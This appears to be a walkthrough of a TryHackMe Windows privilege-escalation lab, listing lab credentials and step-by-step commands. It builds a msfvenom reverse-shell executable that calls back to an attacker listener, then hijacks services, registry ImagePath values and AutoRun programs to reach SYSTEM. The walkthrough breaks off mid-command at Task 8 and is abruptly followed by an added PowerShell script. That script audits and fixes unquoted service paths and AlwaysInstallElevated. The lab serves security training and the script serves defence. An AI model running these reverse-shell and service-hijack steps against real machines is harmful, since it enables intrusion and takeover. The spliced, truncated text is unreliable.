Practice your skills with this TryHackMe Windows PrivEsc room on an intentionally misconfigured Windows VM with multiple ways to get admin/SYSTEM! RDP is available. Credentials: user:password321

Windows PrivEsc v1.0 (room: windows10privesc)
Task 1 – Deploy the Machine
IP: 10.10.187.249
User: user
Password: password321
Protocol: RDP
xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.187.249
Make sure you are connected to the TryHackMe VPN or using the in-browser Kali instance before trying to access the Windows VM!

Task 2 – Generate a Reverse Shell Executable
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f exe -o reverse.exe
sudo nc -nvlp 53
Copy the generated reverse shell executable to the Windows VM and run it
copy \\10.10.10.10\kali\reverse.exe C:\PrivEsc\reverse.exe
C:\PrivEsc\reverse.exe
Task 3 – Service Exploits – Insecure Service Permissions
C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc
sc qc daclsvc
sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""
net start daclsvc
What is the original BINARY_PATH_NAME of the daclsvc service?
C:\Program Files\DACL Service\daclservice.exe
Task 4 – Service Exploits – Unquoted Service Path
sc qc unquotedsvc
C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
net start unquotedsvc
What is the BINARY_PATH_NAME of the unquotedsvc service?
C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
Task 5 – Service Exploits – Weak Registry Permissions
sc qc regsvc
C:\PrivEsc\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
net start regsvc
Task 6 – Service Exploits – Insecure Service Executables
sc qc filepermsvc
C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y
net start filepermsvc
Task 7 – Registry – AutoRuns
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
C:\PrivEsc\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"
copy C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y
rdesktop 10.10.187.249
Task 8 – Registry – AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f msi -o revers
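The misconfigurations used in Task 4 (unquoted service paths) and Task 8 (AlwaysInstallElevated in both hives) are easy to audit and fix on a host you administer. The script below is an added example, not part of the TryHackMe room; it reports both conditions and, when run elevated with -Fix, quotes the offending ImagePath values and sets AlwaysInstallElevated to 0. The -Fix switch and the output object layout are this example's own choices.

```powershell
# Added example (not from the TryHackMe room): audit and remediate the
# Task 4 and Task 8 misconfigurations on a host you administer.
[CmdletBinding(SupportsShouldProcess = $true)]
param([switch]$Fix)   # -Fix is this example's own switch; omit it for a read-only audit

$findings = @()

# Task 4 class: service ImagePath containing spaces but not wrapped in quotes.
$svcKey = 'HKLM:\SYSTEM\CurrentControlSet\Services'
Get-ChildItem -Path $svcKey -ErrorAction SilentlyContinue | ForEach-Object {
    $path = (Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue).ImagePath
    if (-not $path -or $path.StartsWith('"') -or $path -match '\.sys$') { return }  # skip quoted paths and drivers
    # Split into the executable portion (up to ".exe") and any trailing arguments.
    if ($path -match '^(?<exe>.*?\.exe)(?<tail>.*)$' -and $Matches.exe -match '\s') {
        $exe = $Matches.exe; $tail = $Matches.tail
        $findings += [pscustomobject]@{ Check = 'UnquotedServicePath'; Name = $_.PSChildName; Value = $path }
        if ($Fix -and $PSCmdlet.ShouldProcess($_.PSChildName, 'Quote ImagePath')) {
            # Wrap only the executable part so that existing arguments are preserved.
            Set-ItemProperty -Path $_.PSPath -Name ImagePath -Value ('"{0}"{1}' -f $exe, $tail)
        }
    }
}

# Task 8 class: AlwaysInstallElevated only matters when it is 1 in BOTH hives.
$hives = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)
$setInBoth = $true
foreach ($h in $hives) {
    $v = (Get-ItemProperty -Path $h -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
    if ($v -ne 1) { $setInBoth = $false }
}
if ($setInBoth) {
    $findings += [pscustomobject]@{ Check = 'AlwaysInstallElevated'; Name = 'HKLM+HKCU'; Value = '1 in both hives' }
    if ($Fix -and $PSCmdlet.ShouldProcess('AlwaysInstallElevated', 'Set to 0 in both hives')) {
        foreach ($h in $hives) { Set-ItemProperty -Path $h -Name AlwaysInstallElevated -Value 0 -Type DWord }
    }
}

if ($findings.Count -eq 0) { 'No unquoted service paths or AlwaysInstallElevated misconfiguration found.' }
else { $findings | Format-Table -AutoSize }
```

Run it first without -Fix to see what would change, then with -Fix -WhatIf to preview the registry writes before applying them.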